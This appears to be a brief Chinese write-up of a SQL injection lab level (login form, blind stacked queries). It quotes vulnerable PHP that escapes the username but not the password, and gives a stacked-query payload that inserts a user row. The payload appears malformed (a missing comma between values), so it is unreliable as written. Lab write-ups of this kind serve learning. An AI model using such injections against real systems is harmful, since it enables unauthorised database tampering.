第四十四关

本关是基于盲注的,这里盲注主要是要没有报错信息,所以要采用盲注。这关与42关的区别就在于没有报错信息

 

过滤点:

   $username = mysqli_real_escape_string($con1, $_POST["login_user"]);
   $password = $_POST["login_password"];

sql语句:

  $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

复制代码

 

那么这不是 直接构造payload吗?

随意输入用户名,密码如下:

paload:
a';insert into users values(107,'aaa''aaa')#

 

相关文章:

  • 2022-01-02
  • 2021-09-30
  • 2021-10-22
  • 2021-08-22
  • 2021-05-24
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
猜你喜欢
  • 2021-12-20
  • 2022-01-10
  • 2021-09-07
  • 2021-09-27
  • 2022-01-20
  • 2021-05-07
  • 2021-08-23
相关资源
相似解决方案